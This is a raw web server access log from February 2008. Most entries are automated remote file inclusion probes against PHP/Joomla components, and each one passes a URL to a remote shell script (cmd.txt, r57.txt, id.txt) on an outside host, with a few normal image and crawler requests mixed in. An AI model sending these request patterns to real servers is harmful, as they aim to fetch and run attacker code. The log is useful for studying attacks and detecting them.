82.35.84.213 - - [25/Feb/2008:06:54:00 -0800] "GET /logs/access_080211.log//modules/TotalCalendar/about.php?inc_dir=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.30.249.131 - - [25/Feb/2008:06:54:00 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=add%20this? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.30.249.131 - - [25/Feb/2008:06:54:02 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.30.249.131 - - [25/Feb/2008:06:54:33 -0800] "GET /logs/access_080117.log//modules/TotalCalendar/about.php?inc_dir=add%20this? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.110.110 - - [25/Feb/2008:06:54:45 -0800] "GET /logs/access_080111.log//templates/mangobery/footer.sample.php?Site_Path=http://www.ilegais.xpg.com.br/www??????????????????????????http://ilegals.ifrance.com/enos???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.17.35.69 - - [25/Feb/2008:06:55:19 -0800] "GET /logs/access_071202.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.bossad.com/LoTnoK.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
81.17.35.69 - - [25/Feb/2008:06:55:20 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.bossad.com/LoTnoK.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
208.116.41.19 - - [25/Feb/2008:06:55:21 -0800] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [25/Feb/2008:06:55:21 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.116.41.19 - - [25/Feb/2008:06:55:21 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.albashare.net/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.212.210 - - [25/Feb/2008:06:57:34 -0800] "GET /logs/access_080120.log//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:06:57:41 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:06:58:23 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:06:58:23 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:06:58:23 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.92.204.1 - - [25/Feb/2008:06:58:35 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.smagz.com/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.dmulk.com"
81.92.204.1 - - [25/Feb/2008:06:58:35 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.smagz.com/jim.do??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:06:58:35 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.188.66.23 - - [25/Feb/2008:06:58:36 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:06:58:36 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
193.188.66.23 - - [25/Feb/2008:06:58:37 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://anjink.co.cc/gen/mix.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.169.46.98 - - [25/Feb/2008:06:58:37 -0800] "GET /public_includes/pub_blocks/activecontent.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
217.169.46.98 - - [25/Feb/2008:06:58:38 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php HTTP/1.1" 404 275 "-" "Mozilla/4.0" "dmulk.com"
64.113.122.205 - - [25/Feb/2008:06:58:40 -0800] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.17.35.69 - - [25/Feb/2008:06:59:01 -0800] "GET /logs/access_080111.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.bossad.com/LoTnoK.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.239.212.210 - - [25/Feb/2008:06:59:17 -0800] "GET /logs/access_080106.log/index.php?option=com_simpleboard&catid=&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.212.210 - - [25/Feb/2008:06:59:17 -0800] "GET /index.php?option=com_simpleboard&catid=&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
213.239.212.210 - - [25/Feb/2008:06:59:18 -0800] "GET /logs/index.php?option=com_simpleboard&catid=&Itemid=&mosConfig_absolute_path=http://www.bes.org.tr/imgcls/cmd2.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:06:59:36 -0800] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
216.75.63.66 - - [25/Feb/2008:06:59:37 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:00:29 -0800] "GET /logs/access.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.tacticsoverprinciples.org/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:00:29 -0800] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.tacticsoverprinciples.org/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:00:29 -0800] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.tacticsoverprinciples.org/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
217.79.181.37 - - [25/Feb/2008:07:00:52 -0800] "GET /logs/access_080211.log/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://190.8.128.58/.../alba.txt?????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
208.69.192.133 - - [25/Feb/2008:07:01:18 -0800] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.44.248.81 - - [25/Feb/2008:07:01:54 -0800] "GET /administrator/components/com_webring/admin.webring.docs.php?component_dir=http://x.apescar.net/a.jpg?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:02:31 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:02:31 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:02:32 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.102.6 - - [25/Feb/2008:07:03:13 -0800] "GET /logs/access_080126.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
211.234.102.6 - - [25/Feb/2008:07:03:13 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:07:03:30 -0800] "GET /administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:04:05 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:04:30 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:04:30 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:04:30 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.234.102.6 - - [25/Feb/2008:07:05:36 -0800] "GET /logs/access_080107.log//components/com_simpleboard/image_upload.php?sbp=http://www.geocities.com/ntchack/on.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.195.44.108 - - [25/Feb/2008:07:05:38 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.44.97 - - [25/Feb/2008:07:05:38 -0800] "GET /logs/access_080131.log HTTP/1.0" 200 720896 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.223.16.102 - - [25/Feb/2008:07:06:33 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://netbr.org/documents/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:07:07:00 -0800] "GET /logs/access_080107.log//Neos_Chronos/header.php?base_folder=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:07:07:00 -0800] "GET //Neos_Chronos/header.php?base_folder=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:07:07:01 -0800] "GET /logs//Neos_Chronos/header.php?base_folder=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:07:02 -0800] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:07:02 -0800] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:07:03 -0800] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.211.107.26 - - [25/Feb/2008:07:07:46 -0800] "GET /logs/access_080130.log/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.tacticsoverprinciples.org/r57.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
85.119.158.50 - - [25/Feb/2008:07:08:20 -0800] "GET /logs/access_080122.log//Neos_Chronos/header.php?base_folder=http://hornydate.co.uk/sys.txt??? HTTP/1.0" 404 275 "-" "libwww-perl/5.48" "www.dmulk.com"
67.195.58.172 - - [25/Feb/2008:07:09:02 -0800] "GET /logs/access_080131.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
201.31.30.226 - - [25/Feb/2008:07:09:15 -0800] "GET /?mosConfig_absolute_path=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 200 3094 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:07:09:42 -0800] "GET /logs/access_080201.log//modules/TotalCalendar/about.php?inc_dir=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:07:09:42 -0800] "GET /logs//modules/TotalCalendar/about.php?inc_dir=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:10:01 -0800] "GET /logs/access_080117.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:10:01 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:10:01 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:10:10 -0800] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/scrol.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.87.58.146 - - [25/Feb/2008:07:10:42 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/r7.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.136.155.189 - - [25/Feb/2008:07:10:46 -0800] "GET /bikes/dteel/2008_02_23/IMG_4598s.JPG HTTP/1.1" 200 227196 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; ESB{59F90F63-8FC8-4D31-8685-17A1DDFB05A8}; .NET CLR 1.1.4322)" "www.dmulk.com"
70.136.155.189 - - [25/Feb/2008:07:10:47 -0800] "GET /bikes/dteel/2008_02_23/IMG_4600s.JPG HTTP/1.1" 200 280447 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; ESB{59F90F63-8FC8-4D31-8685-17A1DDFB05A8}; .NET CLR 1.1.4322)" "www.dmulk.com"
70.136.155.189 - - [25/Feb/2008:07:10:48 -0800] "GET /bikes/dteel/2008_02_23/IMG_4563s.JPG HTTP/1.1" 200 322574 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; ESB{59F90F63-8FC8-4D31-8685-17A1DDFB05A8}; .NET CLR 1.1.4322)" "www.dmulk.com"
201.31.30.226 - - [25/Feb/2008:07:10:52 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.koreandentists.org/bbs//data1/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.136.155.189 - - [25/Feb/2008:07:10:52 -0800] "GET /bikes/dteel/2008_02_23/IMG_4578s.JPG HTTP/1.1" 200 161693 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; ESB{59F90F63-8FC8-4D31-8685-17A1DDFB05A8}; .NET CLR 1.1.4322)" "www.dmulk.com"
70.136.155.189 - - [25/Feb/2008:07:10:53 -0800] "GET /bikes/dteel/2008_02_23/IMG_4582s.JPG HTTP/1.1" 200 163504 "http://www.st-owners.com/forums/showthread.php?t=36114" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; sbcydsl 3.12; ESB{59F90F63-8FC8-4D31-8685-17A1DDFB05A8}; .NET CLR 1.1.4322)" "www.dmulk.com"
66.135.33.135 - - [25/Feb/2008:07:11:25 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.33.135 - - [25/Feb/2008:07:11:25 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.135.33.135 - - [25/Feb/2008:07:11:25 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.226.79.133 - - [25/Feb/2008:07:11:42 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://statesidelogistics.com/images/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
66.135.33.135 - - [25/Feb/2008:07:12:00 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.250.95.201 - - [25/Feb/2008:07:12:04 -0800] "GET /logs/access_080123.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://yugifire.t35.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [25/Feb/2008:07:12:04 -0800] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://yugifire.t35.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [25/Feb/2008:07:12:05 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://yugifire.t35.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
83.12.24.107 - - [25/Feb/2008:07:12:07 -0800] "GET /logs/access_080117.log/components/com_simpleboard/image_upload.php?sbp=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.12.24.107 - - [25/Feb/2008:07:12:08 -0800] "GET /components/com_simpleboard/image_upload.php?sbp=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.12.24.107 - - [25/Feb/2008:07:12:09 -0800] "GET /logs/components/com_simpleboard/image_upload.php?sbp=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
89.19.3.162 - - [25/Feb/2008:07:12:10 -0800] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.hsbithui.com/modules/Forums/admin/log/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
66.135.33.135 - - [25/Feb/2008:07:12:26 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.zuuniimedee.mn//modules/My_eGallery/data/alba.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:12:53 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:12:53 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:12:54 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.103.128.44 - - [25/Feb/2008:07:13:06 -0800] "GET /logs/access_080131.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
83.12.24.107 - - [25/Feb/2008:07:13:10 -0800] "GET /logs/access_080211.log/components/com_simpleboard/image_upload.php?sbp=http://www.paradstars.com/en/sistem.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
84.18.207.64 - - [25/Feb/2008:07:13:10 -0800] "GET /logs/access_080123.log//modules/TotalCalendar/about.php?inc_dir=http://mykonos.bargaingreece.com//components/com_log/Pram_Foxs.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:13:13 -0800] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:13:13 -0800] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.113.122.205 - - [25/Feb/2008:07:13:13 -0800] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.ar-vision.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
86.109.103.76 - - [25/Feb/2008:07:13:32 -0800] "GET /index.php?option=com_ja_submit&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.250.95.201 - - [25/Feb/2008:07:13:40 -0800] "GET /logs/access_080128.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://yugifire.t35.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.101.4.42 - - [25/Feb/2008:07:14:02 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.greytauctions.org/panji_tengkorak/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
62.75.202.202 - - [25/Feb/2008:07:14:44 -0800] "GET /logs/convert/mvcw_conver.php?step=1&vwar_root=http://www.spree-boom.de/html/.../contrB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
62.75.202.202 - - [25/Feb/2008:07:14:46 -0800] "GET /convert/mvcw_conver.php?step=1&vwar_root=http://www.spree-boom.de/html/.../contrB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
85.214.67.190 - - [25/Feb/2008:07:14:56 -0800] "GET /logs/access_080117.log//components/com_simpleboard/image_upload.php?sbp=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.67.190 - - [25/Feb/2008:07:14:56 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.214.67.190 - - [25/Feb/2008:07:14:56 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://bglradio.net//WebCalendar/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
62.30.249.131 - - [25/Feb/2008:07:15:21 -0800] "GET /logs/access_080103.log/phpsecurityadmin/include/logout.php?PSA_PATH=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.0" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.25.120.246 - - [25/Feb/2008:07:15:33 -0800] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://mensagenss.hospedagemdesite.com/bot/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.30.249.131 - - [25/Feb/2008:07:15:48 -0800] "GET /logs/phpsecurityadmin/include/logout.php?PSA_PATH=http://avvvv.altervista.org/ascomand.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:07:16:21 -0800] "GET /logs/access.log/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
203.211.145.2 - - [25/Feb/2008:07:16:21 -0800] "GET /logs/administrator/components/com_babackup/classes/Tar.php?mosConfig_absolute_path=http://www.cabinmagic.com/catalog/icon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:07:16:29 -0800] "GET /logs/access.log/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:07:16:29 -0800] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
91.142.208.54 - - [25/Feb/2008:07:16:30 -0800] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://phoenixgc.net/sikat??http://phoenixgc.net/sikat?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
